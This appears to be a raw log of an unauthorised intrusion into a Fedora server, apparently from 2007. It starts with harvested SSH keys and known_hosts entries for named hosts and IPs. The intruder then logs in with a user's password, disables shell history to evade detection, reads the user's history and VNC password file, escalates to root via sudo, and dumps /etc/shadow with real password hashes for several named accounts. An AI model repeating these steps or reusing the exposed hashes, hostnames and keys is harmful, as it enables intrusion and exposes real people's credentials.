low8cwzH3bYltUHxYqFmogv7KhXppAzmDuptjqxpAAsiXResTflS484DieIwssz
8z9IB+4hGITpnPOHQT1ddxIq614MbkNlIMbCDXA1Ikbf0UNbJbN5fTd3JBZWU93
lp2blJ+0VcmI2o3SXLZJgiLwAAAIAMXILSm58KHdeCaeNb/EdSXAqnC7ZQ3LElN
dgv0KX2d6t2ec4MWXjoicuIjTE5ZAh4m6e+vVP3yaxSGaxtZ6TZKtS1P2Ku0MnY
Odzer5y7C1EcQXyshYN9uikNEp3yiOk/n2mbHv8BrJr/Q/0FqWVn3FDzJ2O/szt
7iXrx+67IYg==
gumbie@apache.rmachine.net
ssh-dss
AAAAB3NzaC1kc3MAAACBAMhBcEfcxCSsSXvoeP9FA+oyHyDN8N4bH8WMn62STdn
sRGo1BGQNXYw3+wySs7L9XilUOC1Tnorkc9qsgZnsWfujfTRU2WOvdZ+PfkZFhy
ser/xwMbmCNjovC1QONmq+UfvHoisHUPHymSIcL1jN704qB69JOGYwQy8YndPva
JlbAAAAFQCc1KfmY/qwIH/Z0RCTTFiX0DgzIQAAAIAlVsYB57+E7JUvsc54+6ln
zAb84NlzS3aIOI+G4ctrXjQ962RxBEn1YezFH0xfPpnN15C3fTtU+NU/BqWX0Lp
lGMK7xkvelQmPzPINebrWsAGQewWelPfqWABZ+9UIv7KbpnYYmG91aka9Xtdj7+
3b0Xaq5wpQjGTrvlEhUnSOewAAAIBdoaDNivxRzV5oK310p4Wp0PGzfqjzB0glw
zTi0zwvs6nTdA4qqgh1HaU9SYtpUwTq9tNBQs5cftTZS0OuyYfedUtt2DjM6S07
Cj2zkh1C1Obd4M+ABD9LNRigSfyi9wGwtxXpMk7gwTkS1msyqHVD5kSxRTmyUl4
0QukqiAN5PA==
"gumbie@toshiba_dsa"
ssh-dss
AAAAB3NzaC1kc3MAAACBAIu2cdN3RRzMDD7H45m3ycrDZNoiQpm2NAC1fqc6HtX
xt1yE2k5MxNKj2+PJJ5hdPghNZJy7+yD+gsEnbPpEY670yp0WRqF7Pea55zOr5D
8LUt7ONRqSkoMiXCSxXOzbbgpH/f2bucJpeeXU7N4sCsFTwCcs+wOjkWw45WOOY
hYRAAAAFQDVOp3utFXwVFKdWVhF+PWOVFo1UQAAAIAjZoT8OWf+V1myE8qXX53p
tpFz+mkz9Cke/nXnCop7iyWIRMwQyaHiB/m4QFj37jlrVBm3jW185gTJuHcBecp
nLtT+1tZE8v52uvHK1b4Tk+tGZSAnXyFCd2527pzu4UmD89Q3HgSJkPWaimtiR+
upc/7lAda6Vd5gGO6WgSlUIwAAAIBdK2rixeRLzk0OP91F1LyEP6AG7xK7fcjST
PNdQBNx01jk3B2hT/EQZxp5To+F3UCsjqCSlA8+Hzc2BicLfEmL8E+sWgZGuAo/
tREPeLT8YWPL+JEBK5SJBHpWK4YyGw2pw2wpiecg4X6NMDH/SBDo8drhsDmHKIi
H0AmWyeYGxw==
"gumbie@guinness"
ssh-dss
AAAAB3NzaC1kc3MAAAEBAKunfYaKQoO/n2Hd/tQi+BWaB3asXeiG2pHrWXsysMP
FucW5dtzupXlyNQVw7Ul6F9DIf0i2mq0pEYRG3DOwE6WpSRzoaVLwIgreWqfsey
OHPj1VVEpqndD1MBN8DB7KhUqmdcZaA0ZHKckfKQ32jNwQzUv8dLiFpxrMgG4NH
KnxeljB3KEXrvfnaLQKzjZM493Kyz2YRrYRRDEmIV9gDXyf7K7tTfTnEH3QlkZn
tl2EuT7DAwosVp65Sc9eqg/bTbFPwFV1NBtCLHYqhwbr2o4T47K6p52rleIlc0n
KEuIwDC7UXYF/NYK7LlET0Hs2UeORIAqCVpEM9GLtqD86mOEAAAAVALbqDYEBLt
eFV2KXeFxSgg1dTi7vAAABAByEI62hyW1nvzlpZDoYp2IBQfS+VfDFPNoxA4ot9
0KgL0y1cF3HOYVfcEDPj5ONK8246/swSCGgQt8twutXsjIo+xiuYO5h6cPLqRTe
ycMUrP2QQMMxZXuXMJeXLJWJ+e1n5i+vrAJf6X2T0TI+ry6X9u4gtR5uInW58sN
AERtsaxwj+H+ifDIaCFewylmTIOp5A1equsNlHis2B0j7VBLerk7maRGOCzrc4j
dA+ztM5tJaUy8x83bEYiXDOZoeqVmoF2gxTenZiOmQBHDRE4+WlJZCj51eS8r/8
zzSgGMsD0TY5jpcU5zocAi1cd3Woz6oZa8XZPoFke+rr9zK5TwAAAEBAKG8GciK
XT79FOrnntiM3fGqQcI21e6w0GczRX6Q1bie9te7c8Z69HIWHeJ43MKAzWi7Zz8
rPcHAD30VW7bkgGyGHaPBz79ACW5u/A6gCLjYHM/A+RM/4fGIsiVa90Bb6k1nGU
kzRNpp1l+xKrQG9uc8cJXMO5QAuup7FXnZFjMQ3pNs7y9HhCEsSuAIOsCdvHOgz
HW602N1DV76jALAIA1UbY8vv82o5dy+BNxRhjsAOpT17VqJk8SOp+BIpiEIy/gn
fk6lvbHxev2DjM97pRWnmb0lFkNNptlXz7GPh8TAaMUqXocMoVpC4Dqz2TUyNAL
yrZQgtnX+vdfnSjSsyzM=
"gumbie@cyber"
ssh-dss
AAAAB3NzaC1kc3MAAAEBAPb8NR2McHshyGs0vPafixcBm+NpwgMo0Cyd+ltzj0N
yo2hOwj3UXb+zW/w/RHPRBHn2cAPhqSLWYE1BsMaz1nuensZPFGDl0Pr5RGqwx+
Hfj4tJ4zV8uKDGb1NYzvF+243CmHvtXnX7yH65yJTvSNTwDVgsqqHh6w6MbaYak
qsiyVkqEmW/wS4YhEnaVpdPo1ziWdNtsz2uFY0VccHgapDJ6rYV12Wz3wKDbFLd
t7uIaLSd9YNWFYo3Me5G/J+LMq7Nu0w6r6StIQ7r7zOtFvaOvBGtHJ9w6f2Mx4m
d6jknkIZyUojA0CxwAjg15kNJKsHI1yWgH4p90YWxlBcRy9MAAAAVAMdFizakX6
WuAWGiXKvacEuSr+NrAAABAAMQPqx9YN0ijnefZzC1GM+csX0PrhQWoatEmbLe+
/NTE6lUFj79IFF6ImcSTbFrJ4n7k19a0IwvuTICVhpNQPWSML/8gQlGLIZ5Gbf8
t0tRAVffnfwiFxhJxxgUH/yEH0SlrqlenPuPCpTMAmWXoebyL3kVYcyDeSxkeIr
sfqbVBIoXVtUMIZQNKXyCeT5E7z9Nye8aF8lOUWrGIwSeNdfye1/24fTD0V0gAv
m+PLCbTqVsGUoPqksIsha6v/TRceRBtFQGIG4QUja7JUlJpPPYpAV4+ynlWR64W
V7ZIskqlJlGUTv6B0LCcCWz5CnAeQFwpLesiDWqTpRpLODrWYkAAAEAIUb7Gban
iWZRRhk1ytgQXGHlQVnlLBLZCh+BEp1p1ty3jfOIbOg6cAKYVNFBp5g/EH+IUah
1Z+cCSBnitgSMIWpxaCvV4XXT0WwOvATEV6C3Pr+XQ/rcq5E/0jVortUy6rErZT
N6pRYtKVvB4Z8UiEnxata0sgXV3PeUIzBDj7NOUeXnwGjZuJZAKcWg2s4LQerTQ
Puvf/IwIIjeSn+h0TVutsvKT5h/A6mCx7Yg1iM5uXI4I0ayw2mzdrYX96Sfpwfe
tRmu5qVQaYc5pK4PPeQEh2UTYg4cA1QY2kkKKrPhjBPOrAbwc0VukhpQAM1c4gW
LguE7DCkNwP9g1ExjDw==
rhopkins@puma.nfic.com
ssh-dss
AAAAB3NzaC1kc3MAAACBAOdZHYBhapx9Qjmduwyxn02ypuHnvMJnqMaL8g62v/3
wWKEQcPYE5hw4aizWloS9Tu1lzze9S8Rk7MkSjRtLmV+c9MTy40eS2jKRNb1MSu
HZXjvh5n81wObdixCKv89mOy/F7dxespM+JC9mSIGb1LunLV3Zxx3wIXi79auVC
O73AAAAFQDeJ2iv5/woRmyIxYMlZGAUTTNICQAAAIEA2UgPWL7+sU5TStdTWPOn
Bq+g5QRJkZ86R04ObERaCljcq93QJKxASL2q8x5MdyAi7j42FIwQOi1tMi7M4Gp
ozzePEXdJMwkOXtJw6mxBw9wOAXfvUomKkq4VTKC88U6iKA7QP5BtTK9vQbVzeB
rrt/P+dPUo0a7hGCiL+J9VT3YAAACAeFWr1JM2ITHwwS9S0DStR+8fUJE4NHyC3
Tggp9tTgBfnqglp4mAEdGJVdef1bDaEUCKI0XCWo1Eou/TnaQLdbxAYHlygCR+x
NoZ/UOmu9fbuUU43YqzafR8H9i0FO11Q6iN+y2wROD/wXOTig+FEbQW8/h4rHR3
C4pPd7pOX2Fk=
gumbie@vds349.sivit.org
71.192.67.163 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+h
ig6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5
iUhdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/w
q4MTqlP/Nk=
rasterized.net,69.163.232.231 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe
0e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj
4AwxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5
CpHMuAKU70=
server1.zloche.net,65.94.18.39 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
zloche.zapto.org,65.94.86.4 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
rmachine.dynalias.net,71.192.67.95 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+h
ig6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5
iUhdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/w
q4MTqlP/Nk=
65.92.60.252 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
65.94.125.121 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
65.94.19.98 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
65.92.60.23 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
71.192.67.60 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+h
i6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5i
UhdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/wq
4MTqlP/Nk=
server1,65.92.156.231 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
65.94.149.79 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
65.92.158.240 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN
ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7
GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS
XaasNJMb4U=
server4.zloche.net,213.251.160.26 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nh
Xx05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/
qHPS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3H
bwGj6bIiuE=
zloche.net,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkD
XZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ij
RtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3f
claQaSichE=
server4:/home/gumbie/Incoming# logout
djdd@server4:~$ logout
Connection to 213.251.160.26 closed.
[deadlyacid@localhost ~]$ ssh stax@irc.liveits.com
The authenticity of host 'irc.liveits.com (68.184.61.212)' can't be established.
RSA key fingerprint is 39:88:8c:c6:83:7f:d4:c5:f4:aa:3b:96:82:1f:30:65.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'irc.liveits.com,68.184.61.212' (RSA) to the list of known hosts.
stax@irc.liveits.com's password:
Permission denied, please try again.
stax@irc.liveits.com's password:
[deadlyacid@localhost ~]$ ssh djdd@irc.liveits.com
djdd@irc.liveits.com's password:
Last login: Fri Jun 8 19:14:12 2007 from 192.168.2.3
[djdd@lila ~]$ unset HISTFILE ; unset SAVEHIST
[djdd@lila ~]$ w
14:17:05 up 1 day, 19:54, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
djdd pts/4 c-76-108-85-21.h 14:16 0.00s 0.08s 0.01s w
[djdd@lila ~]$ ls -alh
total 320K
drwx------ 11 djdd djdd 4.0K Jun 8 20:58 .
drwxr-xr-x 9 root root 4.0K Jun 5 10:11 ..
-rw------- 1 djdd djdd 2.5K Jun 8 23:18 .bash_history
-rw-r--r-- 1 djdd djdd 24 Jul 12 2006 .bash_logout
-rw-r--r-- 1 djdd djdd 176 Jul 12 2006 .bash_profile
-rw-r--r-- 1 djdd djdd 124 Jul 12 2006 .bashrc
-rw-r--r-- 1 djdd djdd 67 Jun 7 20:08 .DCOPserver_lila.lan.liveits.com__0
lrwxrwxrwx 1 djdd djdd 46 Jun 7 20:08 .DCOPserver_lila.lan.liveits.com_:0 -> /home/djdd/.DCOPserver_lila.lan.liveits.com__0
drwx------ 2 djdd djdd 4.0K Jun 7 20:08 Desktop
-rw------- 1 djdd djdd 26 May 13 14:33 .dmrc
-rw-r--r-- 1 djdd djdd 122K May 28 02:50 firefoxweird.JPG
-rw------- 1 djdd djdd 217 Jun 7 20:08 .ICEauthority
drwx------ 2 djdd djdd 4.0K May 29 17:50 .irssi
drwxrwsrwx 5 1000 1000 4.0K May 26 23:59 irssi-0.8.11
drwxr-xr-x 4 djdd djdd 4.0K Jun 7 20:08 .kde
-rw------- 1 djdd djdd 35 Jun 8 20:53 .lesshst
-rw-r--r-- 1 djdd djdd 0 Jun 8 20:17 lila.lan.liveits.com:2.log
drwx------ 3 djdd djdd 4.0K May 13 14:33 .local
drwxr-xr-x 3 djdd djdd 4.0K May 13 14:33 .mcop
drwxr-xr-x 2 djdd djdd 4.0K Jun 7 20:08 .qt
drwx------ 2 djdd djdd 4.0K Jun 5 11:15 .ssh
-rw------- 1 djdd djdd 910 Jun 8 20:18 .viminfo
drwxr-xr-x 2 djdd djdd 4.0K Jun 8 20:18 .vnc
-rw------- 1 djdd djdd 163 Jun 8 20:58 .Xauthority
-rw-r--r-- 1 djdd djdd 6.8K Jun 7 20:12 .xsession-errors
[djdd@lila ~]$ cat .bash_history
ifvonfig
ifconfig
exit
ls
w
exit
ls
ping google.com
yum install irssi
exit
tail /var/log/messages
tail /var/log/secure
chmod +r /var/log/messages
su chmod +r /var/log/messages
sudo chmod +r /var/log/messages
chmod +r /var/log/messages
sudo chmod +r /var/log/messages
tail /var/log/messages
tail /var/log/secure
sudo chmod +r /var/log/secure
tail /var/log/secure
w
w
who
exit
sudo adduser robivy64
exit
ls
cd ..
ls
cd ..
ls
cd etc
ls
cd ..
ls
cd net
ls
dir
cd ..
ls
cd usr
ls
cd share
ls
cd ..
cd ..
cd var
ls
cd ftp
ls
cd pub
ls
cd ..
cd ..
cd ..
ls
cd etc
ls
cp yp.conf /var/ftp/pub
ls
cd ..
ls
cd home
cd djdd
ls
mv DVDPATH.TXT /var/ftp/pub
sudo mv DVDPATH.TXT /var/ftp/pub
ls
cd irssi-0.8.11/
less install
less INSTALL
ping google.com
ping google.com
ls
cd irssi-0.8.11
ls
./configure
make
su
su
sudo
sudo make install
cd ..
cd ..
ls
cd djdd
irssi
screen irssi
shutdown -r now
ls
sudo shutdown -r now
sudo /sbin/shutdown -r now
locate vsftpd
cd ..
cd ..
ls
cd etc
cd vsftpd
edit vsftpd.conf
vi vsftpd.conf
sudo vi vsftpd.conf
sudo vi vsftpd.conf
services vsftpd
service vsftpd
services vsftpd restart
service vsftp restart
vsftp restart
ls
cd ..
cd rc.d
cd init.d
ls
cd vsftpd
service vsftpd restart
/sbin/service vsftpd restart
sudo /sbin/service vsftpd restart
cd ..
cd ,,
cd ..
cd ..
ls
cd etc
cd vsftpd
sudo vi vsftpd.conf
sudo /sbin/service vsftpd restart
cd /djdd
cd /home/djdd
ls
ls
sudo vi vsftpd.conf
pwd
cd ..
cd ..
ls
cd etc
cd vsftp
ls
cd vsftpd
ls
sudo vi vsftpd.conf
up
/sbin/up
uptime
w
screen irssi
exit
iptables -L -n
/sbin/iptables -L -n
su- /sbin/iptables -L -n
su /sbin/iptables -L -n
sudo /sbin/iptables -L -n
top
sudo /sbin/service vncserver restart
start x
/sbin/start x
screen -raAd
exit
sudo /sbin/iptables -L -n
screen -raAd
exit
screen -raAd
screen -raAd
exit
screen -raAd
exit
screen -raAd
exit
user
exit
ls -la
vncconfig
vncpasswd
ls -la
vncserver
less .vnc/xstartup
cd ..
cd ..
cd etc
cd denyhosts
ls
pqd
pwd
mesg y
write pts3 hey
write gumbie hey
write gumbie pts3 hey
write gumbie 3 hey
mesg y
write gumbie hey
write gumbie pts/3 hey
w
write gumbie pts/1 hey
write gumbie 1 hey
write gumbie pts1 hey
cd ..
cd var
cd lib
cd denyhosts
sudo cd denyhosts
su cd denyhosts
su djdd cd denyhosts
su djdd cd denyhosts
su djdd cd denyhosts
su djdd denyhosts
su djdd
sudo su -
screen -raAd
exit
screen -raAd
screen -raAd
start vncserver
service vncserver start
/sbin/service vncserver start
sudo /sbin/service vncserver start
exit
screen irssi
top
screen _raAd
screen -raAd
exit
start x
startx
ls
top
screen -raAd
[djdd@lila ~]$ cd .ssh
[djdd@lila .ssh]$ ls -alh
total 24K
drwx------ 2 djdd djdd 4.0K Jun 5 11:15 .
drwx------ 11 djdd djdd 4.0K Jun 8 20:58 ..
-rw-r--r-- 1 djdd djdd 237 Jun 5 11:15 known_hosts
[djdd@lila .ssh]$ cat known_hosts
rmachine.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIE
AzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw
3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI
4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
[djdd@lila .ssh]$ cd
[djdd@lila ~]$ cd .vnc
[djdd@lila .vnc]$ ls -alh
total 48K
drwxr-xr-x 2 djdd djdd 4.0K Jun 8 20:18 .
drwx------ 11 djdd djdd 4.0K Jun 8 20:58 ..
-rw-r--r-- 1 djdd djdd 556 Jun 4 00:36 lila.lan.liveits.com:2.log
-rw-r--r-- 1 djdd djdd 6 Jun 4 00:36 lila.lan.liveits.com:2.pid
-rw------- 1 djdd djdd 8 Jun 4 00:35 passwd
-rwxr-xr-x 1 djdd djdd 339 Jun 4 00:36 xstartup
[djdd@lila .vnc]$ cat lila.lan.liveits.com\:2.log
Xvnc Free Edition 4.1.2
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
Underlying X server release 70100000, The X.Org Foundation
Mon Jun 4 00:36:25 2007
vncext: VNC extension running!
vncext: Listening for VNC connections on port 5902
vncext: Listening for HTTP connections on port 5802
vncext: created VNC server for screen 0
Could not init font path element /usr/share/X11/fonts/OTF, removing from list!
Could not init font path element /usr/share/X11/fonts/CID/, removing from list!
[djdd@lila .vnc]$ cat lila.lan.liveits.com\:2.pid
21931
[djdd@lila .vnc]$ cat -tve passwd
M-YIM-AO8NM-^Em[djdd@lila .vnc]$
[djdd@lila .vnc]$ uname -a
Linux lila.lan.liveits.com 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux
[djdd@lila .vnc]$ cat /etc/redhat-release
Fedora Core release 6 (Zod)
[djdd@lila .vnc]$ sudo su -l
Password:
[root@lila ~]# unset HISTFILE ; unset SAVEHIST
[root@lila ~]# cat /etc/shadow
root:$1$wzF0PyjR$ZvLG.q6zdIoqTyfKXxlqq.:13646:0:99999:7:::
bin:*:13646:0:99999:7:::
daemon:*:13646:0:99999:7:::
adm:*:13646:0:99999:7:::
lp:*:13646:0:99999:7:::
sync:*:13646:0:99999:7:::
shutdown:*:13646:0:99999:7:::
halt:*:13646:0:99999:7:::
mail:*:13646:0:99999:7:::
news:*:13646:0:99999:7:::
uucp:*:13646:0:99999:7:::
operator:*:13646:0:99999:7:::
games:*:13646:0:99999:7:::
gopher:*:13646:0:99999:7:::
ftp:*:13646:0:99999:7:::
nobody:*:13646:0:99999:7:::
rpm:!!:13646:0:99999:7:::
dbus:!!:13646:0:99999:7:::
avahi:!!:13646:0:99999:7:::
rpc:!!:13646:0:99999:7:::
mailnull:!!:13646:0:99999:7:::
smmsp:!!:13646:0:99999:7:::
nscd:!!:13646:0:99999:7:::
vcsa:!!:13646:0:99999:7:::
haldaemon:!!:13646:0:99999:7:::
rpcuser:!!:13646:0:99999:7:::
nfsnobody:!!:13646:0:99999:7:::
sshd:!!:13646:0:99999:7:::
netdump:!!:13646:0:99999:7:::
pcap:!!:13646:0:99999:7:::
xfs:!!:13646:0:99999:7:::
ntp:!!:13646:0:99999:7:::
postgres:!!:13646:0:99999:7:::
gdm:!!:13646:0:99999:7:::
djdd:$1$6JY8zLTt$9SqrT5QbtJCyVxUKZXGGq0:13669:0:99999:7:::
gumbie:$1$uCtksbF5$/fb98JXNKTL..dGYkEd45/:13660:0:99999:7:::
ircd:$1$NkM7oRzi$kUyIWDiFZiydl3GpwkHv5/:13660:0:99999:7:::
strayfe:$1$frE7jt1z$xXz6zHRmU75MrF6WiMWhb0:13658:0:99999:7:::
robivy64:$1$s2t7XbSI$lHl122JS6Z/BvoS7FnT16/:13659:0:99999:7:::
nagios:$1$2UnEJtD0$vqvMBdpDuWxuIi749N4IG.:13660:0:99999:7:::
skeet:$1$nVQh8yKx$u.H249CNkRCAWItJrQjIc0:13669:0:99999:7:::
[root@lila ~]# cd ~root
[root@lila ~]# ls -alh
total 336K
drwxr-x--- 16 root root 4.0K Jun 8 11:22 .
drwxr-xr-x 23 root root 4.0K Jun 7 18:23 ..
-rw------- 1 root root 878 May 13 14:25 anaconda-ks.cfg
-rw------- 1 root root 1.2K Jun 7 20:04 .bash_history
-rw-r--r-- 1 root root 24 Jul 12 2006 .bash_logout
-rw-r--r-- 1 root root 191 Jul 12 2006 .bash_profile
-rw-r--r-- 1 root root 176 Jul 12 2006 .bashrc
-rw-r--r-- 1 root root 100 Jul 12 2006 .cshrc
-rw-r--r-- 1 root root 69 Jun 4 00:33 .DCOPserver_lila.lan.liveits.com__1
lrwxrwxrwx 1 root root 41 Jun 4 00:33 .DCOPserver_lila.lan.liveits.com_:1 -> /root/.DCOPserver_lila.lan.liveits.com__1
-rw-r--r-- 1 root root 68 May 24 21:27 .DCOPserver_localhost.localdomain__0
lrwxrwxrwx 1 root root 42 May 24 21:27 .DCOPserver_localhost.localdomain_:0 -> /root/.DCOPserver_localhost.localdomain__0
drwx------ 2 root root 4.0K Jun 4 00:24 Desktop
-rw------- 1 root root 22 Jun 6 15:14 .dmrc
drwxr-xr-x 3 root root 4.0K Jun 6 22:16 .frysk
drwx------ 2 root root 4.0K Jun 7 20:08 .gconf
drwx------ 2 root root 4.0K Jun 7 20:09 .gconfd
drwx------ 3 root root 4.0K May 24 20:31 .gnome2
drwx------ 2 root root 4.0K May 24 20:31 .gnome2_private
-rw------- 1 root root 657 Jun 7 20:04 .ICEauthority
-rw-r--r-- 1 root root 29K May 13 14:24 install.log
-rw-r--r-- 1 root root 3.6K May 13 14:10 install.log.syslog
drwx------ 2 root root 4.0K Jun 7 19:23 .irssi
drwxr-xr-x 4 root root 4.0K Jun 4 00:24 .kde
-rw------- 1 root root 70 Jun 4 17:35 .lesshst
drwx------ 3 root root 4.0K May 24 20:19 .local
-rw------- 1 root root 26K May 27 07:45 mbox
drwxr-xr-x 3 root root 4.0K May 24 20:19 .mcop
drwx------ 3 root root 4.0K May 24 20:44 .mozilla
drwxr-xr-x 2 root root 4.0K May 24 20:18 .qt
-rw-r--r-- 1 root root 190 May 13 14:32 scsrun.log
-r--r----- 1 root root 0 May 24 20:26 sudoers
-rw-r--r-- 1 root root 129 Jul 12 2006 .tcshrc
drwx------ 3 root root 4.0K May 24 21:14 .thumbnails
drwxr-xr-x 2 root root 4.0K Jun 4 00:33 .vnc
-rw------- 1 root root 163 Jun 4 00:33 .Xauthority
-rw------- 1 root root 66 May 24 21:31 .xauthwsjdNh
[root@lila ~]# cat .bash_history
visudo sudoers
visudo -f sudoers
visudo sudoers
edit /etc/sudoers
ifconfig
yum install irssi
ping google.com
yum install irssi
ping google.com
yum install irssi
adduser strayfe
passwd strayfe
vi sudoers
kedit sudoers
visudo
adduser robivy64
passwd robivy64
exit
passwd robivy64
exit
yum install csreen.i386
kill %1
yum install screen.i386
kill %1
less /etc/resolv.conf
ifconfig
route -n
pico /etc/resolv.conf
nano /etc/resolv.conf
cat /etc/resolv.conf
yum install screen.i386
ps x
kill -9 20513
ps x
yum install screen.i386
ls /home
ls ~djdd/
ls ~djdd/irssi-0.8.11/
su - djdd
adduser ircd
ls ~ircd
ls ~ircd -la
cd /etc/sysconfig/
ls
cat network
nano network
grep localhost *
top
kill pid 2080
kill 2080
kill yum-updatesd
kill pid yum-updatesd
kill 2080 yum-updatesd
pwd
cd ..
pwd
cd var
cd lib
cd denyhosts
ls
edit allowed-hosts
vi allowed-hosts
adduser skeet
passwd skeet
sudo
exit
passwd djdd
exit
passwd skeet
exit
ifconfig
vi /etc/resolv.conf
exit
ping rmachine.net
netstat -n
irssi
ifconfig
vi /etc/resolv.conf
vi /etc/resolv.conf
serverice network restart
servrice network restart
service network restart
ping google.com
yum install gnome
irssi
[root@lila ~]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 2028 656 ? Ss Jun07 0:02 init [5]
root 2 0.0 0.0 0 0 ? S Jun07 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SN Jun07 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S Jun07 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S< Jun07 0:00 [events/0]
root 6 0.0 0.0 0 0 ? S< Jun07 0:00 [khelper]
root 7 0.0 0.0 0 0 ? S< Jun07 0:00 [kthread]
root 10 0.0 0.0 0 0 ? S< Jun07 0:00 [kblockd/0]
